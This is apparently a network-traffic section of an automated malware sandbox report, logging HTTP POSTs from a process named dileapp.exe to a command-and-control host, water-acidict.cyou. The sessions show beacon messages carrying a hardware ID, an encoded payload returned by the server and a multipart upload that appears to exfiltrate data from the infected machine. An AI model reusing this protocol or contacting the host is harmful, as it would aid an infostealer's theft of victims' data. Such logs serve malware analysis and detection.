                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:26 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=gkfjjn6vb88so1iefii1jqn5ag; expires=Tue, 25-Mar-2025 15:57:05 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ox7nrjLuEip8uMXk%2F%2BccfhTPpObe28tZWHDkOfREjjM9sqjJ6lZBYLFYThooCcGeMs0KEsDBQgzoBp3tNS98DbuI0iy%2FGzTHqs7mhyMWpTNKAUJStVvAvPseO00ot3pjUjTvye8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed81dc4f0fa9-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1590&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1780487&cwnd=252&unsent_bytes=0&cid=a82e9e2baf3f8671&ts=882&x=0"
                                                                                                                                      2024-11-29 22:10:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-29 22:10:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.449764172.67.156.2174437984C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:27 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 82
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:27 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 26 6a 3d 26 68 77 69 64 3d 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46
                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=c2CoW0--bandl&j=&hwid=97ED8DB064739E362724E926CE495D9F
                                                                                                                                      2024-11-29 22:10:28 UTC1023INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:28 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=lhsfv3hg4rnh0aa316ru5i0np2; expires=Tue, 25-Mar-2025 15:57:06 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2NyIRF9YuCaK0%2By1uoIDDKOtrSiFrMDs76GcKnxP8sP4BDy0XCVn1Ah%2FptXImulE4KBd6SBLmhWD45zDaa%2F4GGh5ygAl4L3Mz%2BBmQKya1Wo%2FHMaJxF7p%2FipFBvZXp2ni%2F2s68w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed8b0b408c63-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1799&rtt_var=733&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=984&delivery_rate=1623123&cwnd=223&unsent_bytes=0&cid=616bf786e8f1e20b&ts=867&x=0"
                                                                                                                                      2024-11-29 22:10:28 UTC54INData Raw: 33 30 0d 0a 38 6a 57 4f 34 42 64 69 33 59 37 5a 70 56 4e 6b 73 5a 46 54 6f 49 70 49 66 61 6b 55 71 4c 4f 66 48 61 33 68 30 63 56 65 63 4e 57 70 61 41 3d 3d 0d 0a
                                                                                                                                      Data Ascii: 308jWO4Bdi3Y7ZpVNksZFToIpIfakUqLOfHa3h0cVecNWpaA==
                                                                                                                                      2024-11-29 22:10:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.449766172.67.156.2174435448C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:28 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 47
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:28 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 26 6a 3d
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--bandl&j=
                                                                                                                                      2024-11-29 22:10:28 UTC1019INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:28 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=ehfc0hsbdq72sv3lh5d7f1m3oi; expires=Tue, 25-Mar-2025 15:57:07 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iDyFFq8mt%2FHjVdndu7f2NjImcpM0MHYxVyKMcU%2BRVxzRICtTb0FV7EDJqTQfHrCL9i%2FXnC2Mgqi6pCqnBqCsUsLSGeV%2FzstSqpkVkt55igutNf8wcMuWwq%2FRB3LuP9pNlydFXX0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed8f78997c90-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1801&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=949&delivery_rate=1523213&cwnd=252&unsent_bytes=0&cid=4b4a1269864de9b9&ts=687&x=0"
                                                                                                                                      2024-11-29 22:10:28 UTC350INData Raw: 34 34 38 38 0d 0a 72 6c 61 69 72 32 4b 74 30 41 6f 45 53 54 39 6b 2b 39 43 73 58 6c 41 32 31 6d 49 79 51 42 73 39 44 57 4f 4e 30 6a 64 44 51 34 6e 56 64 4e 53 4e 57 4a 6e 38 4b 48 63 73 48 56 36 50 6f 74 6b 37 66 42 53 33 42 68 42 36 66 56 78 68 45 4f 6a 2b 46 54 55 75 71 35 51 77 77 38 4d 52 79 50 77 6f 59 54 45 64 58 71 43 72 6a 6a 73 2b 46 4f 78 41 56 79 70 35 58 47 45 42 37 4c 6c 59 4d 79 2f 71 78 6a 72 46 78 77 66 4f 74 47 74 6f 4a 46 6f 42 6e 72 48 47 4d 44 6c 62 76 67 38 51 62 44 6c 59 64 30 47 33 38 48 6f 6d 4e 2b 6a 6a 4e 39 48 45 51 4e 44 38 63 53 59 73 55 55 62 42 38 73 30 37 4d 6c 71 77 42 6c 6b 6f 63 31 56 70 41 4f 6d 34 52 79 6f 6c 34 63 59 30 78 73 59 4e 78 36 42 6d 59 69 4e 52 42 35 53 78 6a 6e 4a 79 55 36 78 41 43 47 49 71 62 57 77 51 2f
                                                                                                                                      Data Ascii: 4488rlair2Kt0AoEST9k+9CsXlA21mIyQBs9DWON0jdDQ4nVdNSNWJn8KHcsHV6Potk7fBS3BhB6fVxhEOj+FTUuq5Qww8MRyPwoYTEdXqCrjjs+FOxAVyp5XGEB7LlYMy/qxjrFxwfOtGtoJFoBnrHGMDlbvg8QbDlYd0G38HomN+jjN9HEQND8cSYsUUbB8s07MlqwBlkoc1VpAOm4Ryol4cY0xsYNx6BmYiNRB5SxjnJyU6xACGIqbWwQ/
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 78 73 4d 42 77 72 4a 36 62 69 42 57 41 34 75 35 78 7a 45 2f 56 4c 6b 4b 58 79 46 35 57 47 55 4c 34 4c 70 52 4c 43 7a 74 7a 44 53 41 67 30 44 49 71 69 67 2b 61 33 34 44 69 62 58 43 4b 6e 42 75 39 42 38 65 4f 7a 6c 59 59 30 47 33 38 46 30 6b 49 75 6a 48 4f 38 50 46 43 39 32 79 65 6d 41 6d 57 42 53 66 74 38 41 32 4d 55 61 2b 44 6c 59 68 63 46 52 6d 42 4f 69 30 46 57 39 68 37 4e 52 30 6d 49 30 68 77 72 6c 6b 62 44 78 64 52 6f 62 38 31 33 77 31 57 50 52 59 45 43 5a 34 57 32 34 46 34 62 35 52 4c 53 66 6c 77 54 76 47 78 77 44 49 75 47 42 75 4b 6c 41 4e 6c 72 4c 4c 4d 54 5a 53 75 41 46 56 59 6a 63 66 61 42 6d 76 36 42 55 50 4a 75 6a 65 64 76 58 4f 44 73 47 31 66 69 59 30 45 78 2f 5a 74 63 4a 38 61 68 53 36 42 56 38 77 65 45 31 71 44 2f 32 38 55 43 63 73 36 4d 49
                                                                                                                                      Data Ascii: xsMBwrJ6biBWA4u5xzE/VLkKXyF5WGUL4LpRLCztzDSAg0DIqig+a34DibXCKnBu9B8eOzlYY0G38F0kIujHO8PFC92yemAmWBSft8A2MUa+DlYhcFRmBOi0FW9h7NR0mI0hwrlkbDxdRob813w1WPRYECZ4W24F4b5RLSflwTvGxwDIuGBuKlANlrLLMTZSuAFVYjcfaBmv6BUPJujedvXODsG1fiY0Ex/ZtcJ8ahS6BV8weE1qD/28UCcs6MI
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 73 47 31 66 69 59 30 45 78 2f 5a 74 63 4a 38 61 68 53 34 43 56 41 70 63 31 74 76 42 75 4b 31 56 69 59 69 35 73 73 2b 7a 73 6f 45 77 37 74 6c 59 43 74 61 41 70 79 67 79 7a 55 2b 57 50 52 4f 45 43 56 68 48 7a 64 42 77 4c 64 44 49 67 37 6f 33 54 32 41 30 6b 37 57 38 6d 39 71 61 77 56 47 6e 72 66 47 4e 7a 52 63 74 42 4a 56 4c 48 4a 65 5a 51 66 75 76 56 6b 6e 49 65 72 4d 4d 73 7a 4e 42 38 69 67 65 6d 4d 74 54 77 7a 5a 2f 49 34 37 4b 68 54 73 51 47 59 79 62 6b 35 35 51 39 71 7a 57 79 38 6d 2f 59 77 72 6a 74 52 41 79 4c 34 6f 50 6d 74 57 42 70 57 31 78 6a 6f 32 58 4c 73 50 57 54 42 34 55 32 45 54 36 4c 42 63 4c 79 37 6e 78 54 6e 48 77 41 76 46 76 32 78 68 4b 68 31 49 32 62 58 57 66 47 6f 55 67 68 42 64 4c 6c 64 55 59 77 69 76 72 78 73 34 59 65 7a 41 64 4a 69 4e
                                                                                                                                      Data Ascii: sG1fiY0Ex/ZtcJ8ahS4CVApc1tvBuK1ViYi5ss+zsoEw7tlYCtaApygyzU+WPROECVhHzdBwLdDIg7o3T2A0k7W8m9qawVGnrfGNzRctBJVLHJeZQfuvVknIerMMszNB8igemMtTwzZ/I47KhTsQGYybk55Q9qzWy8m/YwrjtRAyL4oPmtWBpW1xjo2XLsPWTB4U2ET6LBcLy7nxTnHwAvFv2xhKh1I2bXWfGoUghBdLldUYwivrxs4YezAdJiN
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 64 6e 4c 31 67 44 6e 62 58 4b 4f 6a 30 55 2b 6b 42 58 4f 6a 6b 48 4c 79 37 49 68 52 63 41 47 36 76 54 65 74 6d 4e 42 38 50 79 4d 43 59 6e 58 67 71 52 76 63 67 31 50 6c 36 39 43 31 77 70 66 56 4e 6d 42 4f 6d 78 55 43 51 67 37 38 41 2b 78 73 34 44 77 4c 31 6e 62 6d 73 54 52 70 36 71 6a 6d 52 79 63 61 4d 4c 58 69 51 35 51 43 45 59 72 37 64 5a 59 58 6d 72 77 44 33 47 79 77 58 44 73 32 35 75 4c 6c 55 43 6d 4c 54 49 50 7a 31 51 73 51 46 66 4a 6e 56 52 5a 51 44 75 76 46 34 75 4b 75 36 4d 65 6f 44 4b 47 49 2f 71 4b 46 63 6f 53 78 47 4a 76 6f 34 6a 66 45 33 30 42 31 78 69 49 52 39 75 45 2b 57 36 57 79 51 75 37 73 38 37 78 38 41 47 77 37 68 68 62 69 31 53 44 34 75 78 77 6a 49 31 57 72 67 4f 58 53 68 36 55 69 39 50 72 37 64 4e 59 58 6d 72 34 44 50 4e 34 77 76 44 74
                                                                                                                                      Data Ascii: dnL1gDnbXKOj0U+kBXOjkHLy7IhRcAG6vTetmNB8PyMCYnXgqRvcg1Pl69C1wpfVNmBOmxUCQg78A+xs4DwL1nbmsTRp6qjmRycaMLXiQ5QCEYr7dZYXmrwD3GywXDs25uLlUCmLTIPz1QsQFfJnVRZQDuvF4uKu6MeoDKGI/qKFcoSxGJvo4jfE30B1xiIR9uE+W6WyQu7s87x8AGw7hhbi1SD4uxwjI1WrgOXSh6Ui9Pr7dNYXmr4DPN4wvDt
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 50 52 74 66 79 79 53 52 79 44 50 51 32 56 7a 4a 70 58 43 30 77 2b 62 4e 44 4b 69 7a 6e 6a 43 75 4f 31 45 44 49 76 69 67 2b 61 31 73 4a 6b 4c 48 42 50 54 74 59 75 51 56 5a 4a 33 68 5a 61 77 76 6c 73 46 4d 6e 49 4f 37 47 4e 38 48 48 43 63 69 36 62 32 55 35 48 55 6a 5a 74 64 5a 38 61 68 53 64 42 30 49 73 61 52 39 77 54 2f 62 77 55 69 31 68 73 34 77 77 79 73 49 45 79 4c 35 75 59 79 31 51 42 35 61 7a 7a 6a 4d 32 58 37 30 47 55 53 39 38 55 6d 73 54 35 62 74 61 4c 53 6a 6e 77 58 53 4f 6a 51 66 58 38 6a 41 6d 47 6c 41 49 6c 37 58 59 66 43 30 61 72 55 42 58 4c 6a 6b 48 4c 77 44 6a 76 31 59 75 49 75 6a 4e 50 74 4c 66 44 4d 61 36 62 57 6f 67 55 77 43 4c 74 4d 45 31 4d 56 65 39 42 31 67 75 63 31 78 6f 51 61 48 77 55 6a 6c 68 73 34 77 58 31 39 30 4e 6a 36 30 6d 66 32
                                                                                                                                      Data Ascii: PRtfyySRyDPQ2VzJpXC0w+bNDKiznjCuO1EDIvig+a1sJkLHBPTtYuQVZJ3hZawvlsFMnIO7GN8HHCci6b2U5HUjZtdZ8ahSdB0IsaR9wT/bwUi1hs4wwysIEyL5uYy1QB5azzjM2X70GUS98UmsT5btaLSjnwXSOjQfX8jAmGlAIl7XYfC0arUBXLjkHLwDjv1YuIujNPtLfDMa6bWogUwCLtME1MVe9B1guc1xoQaHwUjlhs4wX190Nj60mf2
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 74 63 67 79 49 46 47 79 44 31 38 72 63 46 74 6e 41 75 2b 30 55 53 59 6b 36 4d 41 2f 78 38 34 50 79 37 74 6d 62 79 51 64 53 4e 6d 31 31 6e 78 71 46 4a 55 62 55 79 35 30 48 33 42 50 39 76 42 53 4c 57 47 7a 6a 44 6a 4f 79 41 44 46 74 47 78 6a 4c 56 63 44 6d 62 6e 4e 4d 7a 5a 53 73 41 39 51 4b 58 42 65 61 51 54 6c 75 31 4d 73 49 75 33 4b 64 49 36 4e 42 39 66 79 4d 43 59 4c 52 67 75 56 74 59 34 6a 66 45 33 30 42 31 78 69 49 52 39 6b 44 65 75 33 56 53 77 69 34 38 6b 77 79 73 67 41 78 36 42 67 5a 69 78 50 46 4a 6d 37 79 7a 41 78 56 4c 41 47 57 53 52 36 57 79 39 50 72 37 64 4e 59 58 6d 72 34 54 6a 48 35 41 66 55 38 6e 63 6f 4d 68 30 42 6c 66 4b 57 66 44 4e 66 76 67 39 64 49 58 39 63 5a 41 54 6c 73 56 49 70 4c 50 6e 50 4f 38 2f 4a 41 4d 43 30 62 6d 63 6b 57 77 47
                                                                                                                                      Data Ascii: tcgyIFGyD18rcFtnAu+0USYk6MA/x84Py7tmbyQdSNm11nxqFJUbUy50H3BP9vBSLWGzjDjOyADFtGxjLVcDmbnNMzZSsA9QKXBeaQTlu1MsIu3KdI6NB9fyMCYLRguVtY4jfE30B1xiIR9kDeu3VSwi48kwysgAx6BgZixPFJm7yzAxVLAGWSR6Wy9Pr7dNYXmr4TjH5AfU8ncoMh0BlfKWfDNfvg9dIX9cZATlsVIpLPnPO8/JAMC0bmckWwG
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 6a 45 54 69 6a 35 33 4e 48 4e 59 66 77 62 34 76 78 56 76 59 65 53 4d 62 50 6d 4e 43 63 69 70 65 58 41 6d 54 51 48 5a 6a 59 42 38 4b 68 54 73 51 47 55 68 64 31 46 6f 46 2f 37 39 63 6a 63 72 37 4e 77 7a 31 38 4a 41 67 66 4a 75 4a 6e 4d 4f 53 4e 6d 32 33 33 78 71 42 4f 5a 62 42 58 45 75 44 7a 30 65 6f 61 6b 56 4e 32 47 7a 6e 6e 71 41 33 30 43 58 38 69 39 6c 4f 55 38 41 6d 71 54 4e 65 77 78 71 6b 78 70 64 4a 47 35 4f 55 54 2f 6f 71 6c 67 6e 4e 76 71 41 49 63 50 44 44 73 69 6b 4b 43 68 72 55 6b 62 42 69 34 35 30 63 6d 76 36 51 45 68 69 49 52 39 61 41 75 47 2b 55 6a 63 77 70 75 73 75 7a 63 73 58 33 76 49 6d 4a 69 30 64 58 73 6e 38 6a 6a 67 6a 46 4f 78 51 41 6e 6b 73 44 44 68 52 76 61 38 62 4f 47 48 39 6a 47 79 53 67 30 44 64 38 6a 41 6d 62 46 34 55 69 37 54 4e
                                                                                                                                      Data Ascii: jETij53NHNYfwb4vxVvYeSMbPmNCcipeXAmTQHZjYB8KhTsQGUhd1FoF/79cjcr7Nwz18JAgfJuJnMOSNm233xqBOZbBXEuDz0eoakVN2GznnqA30CX8i9lOU8AmqTNewxqkxpdJG5OUT/oqlgnNvqAIcPDDsikKChrUkbBi450cmv6QEhiIR9aAuG+UjcwpusuzcsX3vImJi0dXsn8jjgjFOxQAnksDDhRva8bOGH9jGySg0Dd8jAmbF4Ui7TN
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 51 59 45 48 6f 35 61 6d 77 50 34 62 64 44 4d 47 7a 4d 77 6a 50 42 32 78 44 59 76 53 67 6f 61 31 74 47 77 65 43 41 66 44 5a 46 39 46 67 41 63 43 49 4b 50 46 61 2f 34 6b 70 76 4f 4b 76 61 64 4a 69 66 54 6f 2b 67 4b 44 35 72 47 67 57 4c 6f 4d 67 2f 4a 46 66 7a 50 6d 34 46 64 31 68 75 46 2f 2b 6e 57 6d 34 50 33 65 30 4b 2f 74 67 44 77 62 78 76 63 44 6f 64 53 4e 6d 39 6a 6d 51 4c 46 50 78 41 62 32 77 35 52 79 39 5a 72 34 56 57 4c 79 2f 73 32 69 57 4e 36 67 37 49 73 33 35 32 50 46 4a 4a 74 34 54 76 66 48 77 55 73 6b 41 49 63 44 63 66 61 78 43 76 36 41 56 7a 65 72 36 66 59 35 43 66 48 34 47 72 4b 48 42 72 42 56 54 58 38 74 78 38 61 68 54 7a 41 30 49 77 66 31 78 35 41 71 69 4f 61 77 59 76 37 4d 30 69 30 4d 41 4d 37 72 46 35 62 42 56 6a 45 35 71 38 77 44 73 6b 52
                                                                                                                                      Data Ascii: QYEHo5amwP4bdDMGzMwjPB2xDYvSgoa1tGweCAfDZF9FgAcCIKPFa/4kpvOKvadJifTo+gKD5rGgWLoMg/JFfzPm4Fd1huF/+nWm4P3e0K/tgDwbxvcDodSNm9jmQLFPxAb2w5Ry9Zr4VWLy/s2iWN6g7Is352PFJJt4TvfHwUskAIcDcfaxCv6AVzer6fY5CfH4GrKHBrBVTX8tx8ahTzA0Iwf1x5AqiOawYv7M0i0MAM7rF5bBVjE5q8wDskR
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 73 65 6b 31 39 42 2b 79 6d 56 6d 59 66 31 65 45 6d 78 39 30 44 6a 59 4e 6c 59 6a 31 49 42 59 6d 31 38 41 49 66 52 72 4d 51 55 32 42 56 57 47 49 4e 30 59 35 69 4d 43 62 37 6a 68 4c 44 32 77 4f 50 2f 43 68 2b 61 77 56 47 74 4b 44 4a 4c 44 45 57 6d 41 64 64 4c 6a 6c 41 49 52 69 76 70 68 56 35 63 71 57 4d 4a 6f 43 56 51 49 69 78 65 6e 51 74 58 68 43 61 39 66 41 43 48 30 61 7a 45 46 4e 67 53 46 4a 72 46 2f 71 7a 52 53 59 66 31 65 45 6d 78 39 30 44 6a 5a 64 53 4a 42 70 4c 42 5a 6d 38 79 58 78 38 46 4b 78 41 43 47 4a 55 54 57 67 52 37 50 4a 77 47 32 50 61 32 6a 66 41 77 77 65 50 2f 43 68 71 61 77 56 47 6c 4b 44 4a 4c 44 45 59 73 78 70 58 59 6d 59 52 64 6b 48 35 38 41 31 79 62 36 76 65 64 4a 69 4e 52 38 47 2f 61 57 55 6c 58 68 53 4c 74 4d 30 71 4d 52 4f 4b 50 6e
                                                                                                                                      Data Ascii: sek19B+ymVmYf1eEmx90DjYNlYj1IBYm18AIfRrMQU2BVWGIN0Y5iMCb7jhLD2wOP/Ch+awVGtKDJLDEWmAddLjlAIRivphV5cqWMJoCVQIixenQtXhCa9fACH0azEFNgSFJrF/qzRSYf1eEmx90DjZdSJBpLBZm8yXx8FKxACGJUTWgR7PJwG2Pa2jfAwweP/ChqawVGlKDJLDEYsxpXYmYRdkH58A1yb6vedJiNR8G/aWUlXhSLtM0qMROKPn


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.449765172.67.156.2174437568C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:28 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=C4R8YZVX4TQWJ0I63Y
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20437
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:28 UTC15331OUTData Raw: 2d 2d 43 34 52 38 59 5a 56 58 34 54 51 57 4a 30 49 36 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 43 34 52 38 59 5a 56 58 34 54 51 57 4a 30 49 36 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 34 52 38 59 5a 56 58 34 54 51 57 4a 30 49 36 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c
                                                                                                                                      Data Ascii: --C4R8YZVX4TQWJ0I63YContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--C4R8YZVX4TQWJ0I63YContent-Disposition: form-data; name="pid"3--C4R8YZVX4TQWJ0I63YContent-Disposition: form-data; name="lid"c2CoW0--bandl
                                                                                                                                      2024-11-29 22:10:28 UTC5106OUTData Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
                                                                                                                                      Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                      2024-11-29 22:10:29 UTC1022INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:29 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=e577abnfdiqlss4d58ibkfi6a1; expires=Tue, 25-Mar-2025 15:57:07 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBEae0Fv9%2FgEEJA9V2JPs3B0t%2FQxlqIx1d%2Bmt%2BeMBmwjFnJAgrNJnurFFQssNiO1Nx0urCgyec4BheYFcbKFZWzJN4m6ejZtWN7noXM189GsapN0nAuvSapxQ7HbKSdrUe6bPGM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed8f193542ef-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1661&rtt_var=644&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21401&delivery_rate=1673352&cwnd=218&unsent_bytes=0&cid=487d90ad36f6db2b&ts=1256&x=0"
                                                                                                                                      2024-11-29 22:10:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.449767172.67.156.2174437568C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:30 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=QZF5UCHRAF44KR9
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1249
                                                                                                                                      Host: water-acidict.cyou
